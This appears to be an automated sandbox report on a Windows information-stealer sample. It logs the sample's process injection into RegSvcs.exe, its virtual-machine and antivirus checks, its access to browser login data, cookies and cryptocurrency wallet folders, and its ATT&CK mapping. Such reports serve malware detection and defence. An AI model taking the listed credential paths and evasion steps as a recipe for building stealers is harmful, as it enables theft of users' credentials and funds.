                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeAPI/Special instruction interceptor: Address: 2393244
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2200Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 6399Jump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-98614
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeAPI coverage: 4.8 %
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_007A4696
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AC93C FindFirstFileW,FindClose,0_2_007AC93C
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007AC9C7
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007AF200
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007AF35D
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007AF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007AF65E
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007A3A2B
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007A3D4E
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007ABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007ABF27
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00744AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00744AFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: RegSvcs.exe, 00000001.00000002.1832520493.0000000000D26000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNL
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeAPI call chain: ExitProcess graph end nodegraph_0-97369
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeAPI call chain: ExitProcess graph end nodegraph_0-97441
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007B41FD BlockInput,0_2_007B41FD
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00743B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00743B4C
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00775CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00775CCC
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007BC304 LoadLibraryA,GetProcAddress,0_2_007BC304
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_023934B0 mov eax, dword ptr fs:[00000030h]0_2_023934B0
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_02393510 mov eax, dword ptr fs:[00000030h]0_2_02393510
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_02391E70 mov eax, dword ptr fs:[00000030h]0_2_02391E70
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007981F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007981F7
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076A364 SetUnhandledExceptionFilter,0_2_0076A364
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0076A395
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AFC008Jump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00798C93 LogonUserW,0_2_00798C93
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00743B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00743B4C
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00744A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00744A35
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A4EF5 mouse_event,0_2_007A4EF5
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\b3u71vBG0u.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007981F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_007981F7
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007A4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007A4C03
                  Source: b3u71vBG0u.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: b3u71vBG0u.exeBinary or memory string: Shell_TrayWnd
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0076886B cpuid 0_2_0076886B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007750D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_007750D7
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00782230 GetUserNameW,0_2_00782230
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_0077418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0077418A
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_00744AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00744AFE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: RegSvcs.exe, 00000001.00000002.1832520493.0000000000CCC000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1838545477.00000000061B6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: b3u71vBG0u.exe PID: 6292, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1928, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                  Source: b3u71vBG0u.exeBinary or memory string: WIN_81
                  Source: b3u71vBG0u.exeBinary or memory string: WIN_XP
                  Source: b3u71vBG0u.exeBinary or memory string: WIN_XPe
                  Source: b3u71vBG0u.exeBinary or memory string: WIN_VISTA
                  Source: b3u71vBG0u.exeBinary or memory string: WIN_7
                  Source: b3u71vBG0u.exeBinary or memory string: WIN_8
                  Source: b3u71vBG0u.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                  Source: Yara matchFile source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: b3u71vBG0u.exe PID: 6292, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1928, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.b3u71vBG0u.exe.23a0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.b3u71vBG0u.exe.23a0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: b3u71vBG0u.exe PID: 6292, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1928, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007B6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_007B6596
                  Source: C:\Users\user\Desktop\b3u71vBG0u.exeCode function: 0_2_007B6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_007B6A5A
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure2
                  Valid Accounts
                  221
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  Exploitation for Privilege Escalation
                  11
                  Disable or Modify Tools
                  1
                  OS Credential Dumping
                  2
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Native API
                  2
                  Valid Accounts
                  1
                  DLL Side-Loading
                  1
                  Deobfuscate/Decode Files or Information
                  21
                  Input Capture
                  1
                  Account Discovery
                  Remote Desktop Protocol2
                  Data from Local System
                  1
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                  Valid Accounts
                  2
                  Obfuscated Files or Information
                  Security Account Manager1
                  File and Directory Discovery
                  SMB/Windows Admin Shares21
                  Input Capture
                  11
                  Non-Standard Port
